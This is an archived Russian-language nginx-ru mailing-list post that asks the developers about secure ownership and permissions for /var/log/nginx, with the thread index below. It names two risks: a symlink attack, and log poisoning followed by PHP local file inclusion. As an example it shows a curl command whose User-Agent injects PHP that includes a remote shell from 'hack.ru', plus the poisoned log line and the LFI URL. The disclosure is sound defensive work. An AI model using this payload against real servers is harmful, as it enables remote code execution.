Welcome! Log In Create A New Profile

Advanced

/var/log/nginx

Gena Makhomed
December 14, 2010 01:06PM
Здравствуйте!

есть небольшие проблемы с /var/log/nginx

1. если владелец этого каталога nginx:nginx,
и права доступа 0700 - такая установка будет уязвима
к symlink attack, потому что лог-файлы в этом каталоге
master-процесс открывает на запись при запуске nginx
и он не делает никаких проверок symlink это или нет.

2. если владелец этого каталога root:root,
и права доступа 0755 - такая установка будет уязвима
к атаке "php local file inclusion vulnerability
elevation to remote code execution":

# curl -A "<? include 'http://hack.ru/shell.php'; ?>" http://t/

# tail -n 1 /var/log/nginx/access.log
10.10.10.10 - - [14/Dec/2010:19:34:24 +0200] "GET / HTTP/1.1" 200 15777
"-" "<? include 'http://hack.ru/shell.php' ?>"

и если запущенный на хосте PHP можно каким-то путем заставить сделать
include этого локального файла - выполнится код с удаленного сайта.
например, http://site.ru/index.php?file=/var/log/nginx/access.log

код "<? include 'http://hack.ru/shell.php' ?>" приведен только
для примера, на самом деле, там может быть любой php-код, который
будет работать даже в случае если параметр allow_url_fopen = Off

3. если владелец этого каталога root:nginx,
и права доступа 0750 - на первый взгляд всё нормально,
однако если php-fastcgi входит в группу nginx,
или пользователь httpd входит в группу nginx,
то будет тот же результат, что и в п.2 - так что
это решение можно назвать ненадежным и частичным.

=========================================================================

хотелось бы услышать советы / рекомендации автора и разработчиков nginx
как именно лучше всего будет поступить maintainer`ам в этой ситуации:

- выставить на каталог владелец / права root:nginx 0750
и смириться с тем, что это решение не является 100%-ым,
потому что одновременно надо чтобы слишком много условий
совпало для того чтобы получить vulnerability elevation.

- пропатчить nginx чтобы master-процесс не открывал на запись файлы,
если это на самом деле symlink`и, чтобы устранить его восприимчивость
к symlink attack в этом случае и во всех остальных подобных случаях.
(если это symlink и файл надо открыть на запись - тогда unlink symlink)

- или какой-то другой вариант решения, чтобы получить 100% надежность.

--
Best regards,
Gena


_______________________________________________
nginx-ru mailing list
nginx-ru@nginx.org
http://nginx.org/mailman/listinfo/nginx-ru
Subject Author Posted

/var/log/nginx

Gena Makhomed December 14, 2010 01:06PM

Re: /var/log/nginx

Gena Makhomed December 14, 2010 01:22PM

Re: /var/log/nginx

Maxim Dounin December 14, 2010 01:52PM

Re: /var/log/nginx

Gena Makhomed December 14, 2010 03:00PM

Re: /var/log/nginx

Igor Sysoev December 14, 2010 04:46PM

Re: /var/log/nginx

Gena Makhomed December 15, 2010 02:00PM

Re: /var/log/nginx

Maxim Dounin December 14, 2010 07:38PM

Re: /var/log/nginx

Gena Makhomed December 15, 2010 02:38PM

Re: /var/log/nginx

Alexey V. Karagodov December 15, 2010 02:52PM

Re: /var/log/nginx

Gena Makhomed December 15, 2010 03:32PM

Re: /var/log/nginx

Rauf Kuliyev December 15, 2010 04:42PM

Re: /var/log/nginx

Alexey V. Karagodov December 15, 2010 04:44PM

Re: /var/log/nginx

Maxim Dounin December 15, 2010 05:24PM

Re: /var/log/nginx

Gena Makhomed December 15, 2010 06:30PM

Re: /var/log/nginx

Maxim Dounin December 15, 2010 09:06PM

Re: /var/log/nginx

Gena Makhomed December 16, 2010 06:12AM

Re: /var/log/nginx

Alexander Kardailsky December 16, 2010 06:22AM

Re: /var/log/nginx

Anton Farygin December 16, 2010 07:36AM

Re: /var/log/nginx

greenh December 16, 2010 07:42AM

Re: /var/log/nginx

Gena Makhomed December 19, 2010 06:32AM

Re: /var/log/nginx

Maxim Dounin December 19, 2010 04:04PM

Re: /var/log/nginx

Gena Makhomed January 06, 2011 05:40AM

Re: /var/log/nginx

Pavel V. January 09, 2011 03:40PM

Re: /var/log/nginx

kav January 09, 2011 04:04PM

Re: /var/log/nginx

Alexander Engel January 09, 2011 04:16PM

Re: /var/log/nginx

kav January 09, 2011 04:48PM

Re: /var/log/nginx

Александр Лозовюк January 09, 2011 04:52PM

Re: /var/log/nginx

kav January 09, 2011 10:50PM

Re: /var/log/nginx

Gena Makhomed December 14, 2010 03:50PM

Re: /var/log/nginx

Igor Sysoev December 14, 2010 04:50PM

Re: /var/log/nginx

Maxim Dounin December 14, 2010 08:04PM

Re: /var/log/nginx

Maxim Dounin December 14, 2010 08:02PM

Re: /var/log/nginx

Peter Vereshagin January 14, 2011 10:04AM

Re: /var/log/nginx

Pavel V. January 14, 2011 01:54PM

Re: /var/log/nginx

Maxim Dounin January 14, 2011 03:02PM

Re: /var/log/nginx

Pavel V. January 15, 2011 12:36PM

Re: /var/log/nginx

Sergej Kandyla January 17, 2011 04:46AM

Re: /var/log/nginx

Pavel V. January 17, 2011 11:30AM

Re: /var/log/nginx

Peter Vereshagin January 15, 2011 08:36AM

Re: /var/log/nginx

Pavel V. January 15, 2011 12:18PM

Re: /var/log/nginx

Gena Makhomed January 15, 2011 12:52PM

Re: /var/log/nginx

Pavel V. January 15, 2011 01:20PM

Re: /var/log/nginx

Peter Vereshagin January 16, 2011 02:40AM

Re: /var/log/nginx

Pavel V. January 16, 2011 10:54AM

Re: /var/log/nginx

Peter Vereshagin January 17, 2011 04:58AM

Re: /var/log/nginx

Peter Vereshagin January 18, 2011 06:48AM



Sorry, only registered users may post in this forum.

Click here to login

Online Users

Guests: 176
Record Number of Users: 8 on April 13, 2023
Record Number of Guests: 421 on December 02, 2018
Powered by nginx      Powered by FreeBSD      PHP Powered      Powered by MariaDB      ipv6 ready